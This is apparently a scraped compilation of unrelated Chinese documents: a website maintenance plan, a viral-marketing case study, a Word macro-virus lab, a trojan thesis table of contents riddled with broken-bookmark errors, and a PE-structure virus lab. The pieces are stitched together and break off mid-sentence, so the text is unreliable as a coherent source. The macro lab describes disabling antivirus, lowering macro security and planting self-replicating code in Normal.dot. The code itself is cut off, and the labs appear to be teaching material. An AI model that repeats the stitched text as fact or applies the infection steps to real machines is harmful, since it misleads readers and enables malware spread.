六、网站维护1、服务器及相关软硬件的维护,对可能出现的问题进行评估,制定响应时间。2、数据库维护,有效地利用数据是网站维护的重要内容,因此数据库的维护要受到重视。3、及时进行网站内容的更新、调整等。4、制定相关网站维护的规定,将网站维护制度化、规范化。 七、网站测试网站发布前要进行细致周密的测试,以保证正常浏览和使用。主要测试内容有:1、服务器稳定性、安全性。2、程序及数据库测试。3、网页兼容性测试,如浏览器、显示器。4、根据需要进行其他测试。 八、网站发布与推广1、网站测试后进行发布的公关,广告等活动。2、搜索引掣登记等。 九、网站建设日程表各项规划任务的开始完成时间,负责人等。 十、费用明细各项事宜所需费用清单。 2、试为“格兰仕微波炉电子商务网站”拟定设计规划书。
病毒营销成功案例_病毒营销案例分析 所谓病毒营销系统,简而言之就是可以将自己的产品像病毒一样的无限的传播出去,使自己受益,让"病毒"为自己工作的一套系统。这个产品可以是实际的产品、可以是服务。了解病毒营销的人都知道,病毒性营销是一种实用的网络营销方法,常用于进行网站推广、品牌推广等。病毒性营销利用的是用户口碑传播的原理,在互联网上,这种口碑传播更为方便,可以像病毒一样迅速蔓延,因此病毒性营销成为一种高效的信息传播方式。而且,由于这种传播是用户之间自发进行的,因此几乎是不需要费用的网络营销手段。 病毒营销成功案例1:"山寨春晚" 一个叫老孟的民间"伙夫"花了140元举起的"山寨春晚" 大旗得到众多网友力挺,而其还申请了一个叫CCSTV的网站和央视春晚PK。目前该话题已经成为百度搜索最热门的关键词之一。据悉,目前"山寨春晚"赞助费已经拿到了几百万。 启发:"山寨营销"的本质是借势造势。策动中国 对于不知名的品牌,要想迅速成名,必须去借助社会热点事件、名人、社会文化等,形成人们和媒体关注的"社会话题"。例如,在"山寨春晚"的策划中,策划人很聪明的将话题转向了"话语权","当众人褒贬不一时,山寨当事者则称:我们要的无非是一个话语权",进一步的引发舆论的争议。而这种"八卦"的事
件,恰恰需要的是争议和炒作! 因此,"山寨春晚"的策划名副其实的将成为20xx年最成功的"病毒营销"案例! 关键词:病毒营销和口碑营销 病毒性营销是一种常用的网络营销方法,常用于进行网站推广、品牌推广等。病毒性营销利用的是用户口碑传播的原理,在互联网上,这种"口碑传播"更为方便,可以像病毒一样迅速蔓延,因此病毒性营销成为一种高效的信息传播方式,而且,由于这种传播是用户之间自发进行的,因此几乎是不需要费用的网络营销手段。 病毒性营销并非真的以传播病毒的方式开展营销,而是通过用户的口碑宣传网络,信息像病毒一样传播和扩散,利用快速复制的方式传向数以千计、数以百万计的受众。病毒性营销既可以被看作是一种网络营销方法,也可以被认为是一种网络营销思想,即通过提供有价值的信息和服务,利用用户之间的主动传播来实现网络营销信息传递的目的。 美誉达BBSN网络声誉管理机构 将有效的"病毒营销"战略归纳为六项基本要素。一个"病毒营销"战略不一定包含所有的要素,但是包含的要素越多,营销的效果可能越好。这六个基本要素是: 1.产品或服务的利益点和价值点要鲜明。(很好用的产品和服务,或者有趣的活动和话题)
计算机宏病毒分析 一、实验目的 ?了解“宏病毒”机理; ?掌握清除宏病毒的方法; ?掌握采用“宏”和脚本语言进行编程的技术。 二、实验环境 ?Windows 7 64位旗舰版 ?Office Word2010字处理软件。 三、实验要求 ?宏的编写; ?理解宏病毒的作用机制。 四、实验步骤: 1.软件设置 关闭杀毒软件;打开Word字处理软件,在工具“宏”的“安全性”中,将“安全级”设置为低,在“可靠发行商”选项卡中,选择信任任何所有安装的加载项和模板,选择“信任visual basic项目的访问”。 注意:为了保证该实验不至于造成较大的破坏性,进行实验感染后,被感染终端不要打开过多的word文档,否则清除比较麻烦(对每个打开过的文档都要清除)。 2.自我复制功能演示 打开一个word文档,然后按Alt+F11调用宏编写窗口(工具“宏”“Visual Basic宏编辑器”),在左侧的“project—>Microsoft Word”对象“ThisDocument”中输入以下代码(Macro-1),保存,此时当前word文档就含有宏病毒,只要下次打开这个word文档,就会执行以上代码,并将自身复制到Normal.dot(word 文档的公共模板)和当前文档的ThisDocument中,同时改变函数名(模板中为Document_Close,当前文档为Document_Open),此时所有的word文档打开和关闭时,都将运行以上的病毒代码,可以加入适当的恶意代码,影响word的正常使用,本例中只是简单的跳出一个提示框。 完整代码如下: 'Macro-1:Micro-Virus
西安翻译学院XI’AN FANYI UNIVERSITY 毕业论文 题目: 网络木马病毒的行为分析专业: 计算机网络技术 班级: 姓名: 彭蕊蕊 指导教师: 朱滨忠 5月 目录学号: 院系: 诒华
1 论文研究的背景及意义........................... 错误!未定义书签。 2 木马病毒的概况................................. 错误!未定义书签。 2.1 木马病毒的定义............................ 错误!未定义书签。 2.2 木马病毒的概述............................ 错误!未定义书签。 2.3 木马病毒的结构............................ 错误!未定义书签。 2.4 木马病毒的基本特征........................ 错误!未定义书签。 2.5木马病毒的分类............................. 错误!未定义书签。 2.6木马病毒的危害............................. 错误!未定义书签。 3 木马程序病毒的工作机制......................... 错误!未定义书签。 3.1 木马程序的工作原理........................ 错误!未定义书签。 3.2 木马程序的工作方式........................ 错误!未定义书签。 4 木马病毒的传播技术............................. 错误!未定义书签。 4.1 木马病的毒植入传播技术.................... 错误!未定义书签。 4.2 木马病毒的加载技术........................ 错误!未定义书签。 4.3 木马病毒的隐藏技术........................ 错误!未定义书签。 5 木马病毒的防范技术............................. 错误!未定义书签。 5.1防范木马攻击............................... 错误!未定义书签。 5.2 木马病毒的信息获取技术.................... 错误!未定义书签。 5.3 木马病毒的查杀............................ 错误!未定义书签。 5.4 反木马软件................................ 错误!未定义书签。 6 总结........................................... 错误!未定义书签。
防病毒实验报告 姓名:王宝 学号:08103663 班级:信安10-1班 指导教师:朱长征 2013.7
实验一PE结构分析及DOS病毒感染与清除 一、实验目的 1.熟悉PE文件结构 2.掌握DOS系统下.EXE文件病毒感染与清除方法 二、实验要求 1.实验之前认真准备,编写好源程序。 2.实验中认真调试程序,对运行结果进行分析,注意程序的正确性和健壮性的验证。 3.不断积累程序的调试方法。 三、实验内容 1)手工或编程从user32.dll中获得MessageBoxA的函数地址;1、打开lordPE软件,查找user32.dll,找到如下图: 图 1
2、右击点载入到PE文件编辑器 3、点击目录,查看目录表信息 4、用软件给出的文件位置计算器就可以得到MessageBoxA的一些信息如下:
如此就可以得到MessageBoxA的VA。又因为,文件中的地址与内存中表示不同,它是用偏移量(File offset)来表示的。在SoftICE和W32Dasm下显示的地址值是内存地址(memory offset),或称之为虚拟地址(Virual Address,VA)。而十六进制工具里,如:Hiew、Hex Workshop等显示的地址就是文件地址,称之为偏移量(File offset) 或物理地址(RAW offset)。所以偏移地址就是物理地址。这样就得到了MessageBoxA的地址了。
2)查阅资料,结合第2章内容,根据PE结构编写一个小的工具软件,或者用PE Explorer、PEditor、Stud_PE等工具软件查看、分析PE 文件格式。针对PE文件格式,请思考:Win32病毒感染PE文件,须对该文件作哪些修改; PE的总体结构如下表所示: DOS MZ header部分是DOS时代遗留的产物,是PE文件的一个遗传基因,一个Win32程序如果在DOS下也是可以执行,只是提示:“This